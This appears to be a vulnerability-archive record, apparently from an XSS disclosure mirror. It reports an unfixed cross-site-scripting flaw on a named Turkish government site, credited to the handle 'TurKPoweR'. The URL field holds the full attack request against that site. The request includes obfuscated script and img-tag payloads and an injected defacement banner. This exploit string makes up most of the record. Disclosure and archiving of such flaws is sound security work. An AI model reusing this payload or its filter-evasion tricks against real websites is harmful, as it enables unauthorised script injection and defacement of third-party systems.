Security researcher TurKPoweR, has submitted on 30/06/2009 a cross-site-scripting (XSS) vulnerability affecting sgb.bayindirlik.gov.tr, which at the time of submission ranked 692309 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 30/06/2009 |
Date published: 16/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: TurKPoweR |
Domain: sgb.bayindirlik.gov.tr |
Category: XSS |
Pagerank: 692309 |
URL: http://sgb.bayindirlik.gov.tr/giris.aspx?__LASTFOCUS=111-222-1933email@address.tst&__VIEWSTATE=%2FwE PDwULLTE4MTQxNzk0NzYPZBYCAgMPZBYGAgEPFgIeA3NyYwUhQXBwX3RoZW1lcy9UaGVtZTEvaW1hZ2VzL2xvZ28uZ2lmZAIDD2Q WAgIBDw8WAh4EVGV4dAUgQkFZSU5ESVJMSUsgVkUgxLBTS0FOIEJBS0FOTEnEnklkZAIXDw8WAh8BBQ4xLjAuMzM1NS4yMzU1NWR kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQpjaGtIYXRpcmxhoes%2FK8%2FdxmhP1mdPy8h%2FDAki%2BMw %3D&txtKKod=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%2840014,9080338542%29%3B%22%3E&txtParola=11 1-222-1933email@address.tst&chkHatirla=on&btnGiris=>"><ScRiPt%20%0a%0d>alert(/XSS%20By%20TurKPoweR%2 0-%20FROM%20TURKEY/)%3B</ScRiPt><h1>XSS%20By%20TurKPoweR%20-%20ADMIN%20KARDES%20LUTFEN%20DEVLET%20SI TELERINDE%20DAHA%20DIKKATLI%20OL%20</h1> |
Click here to view the mirror
|
|
|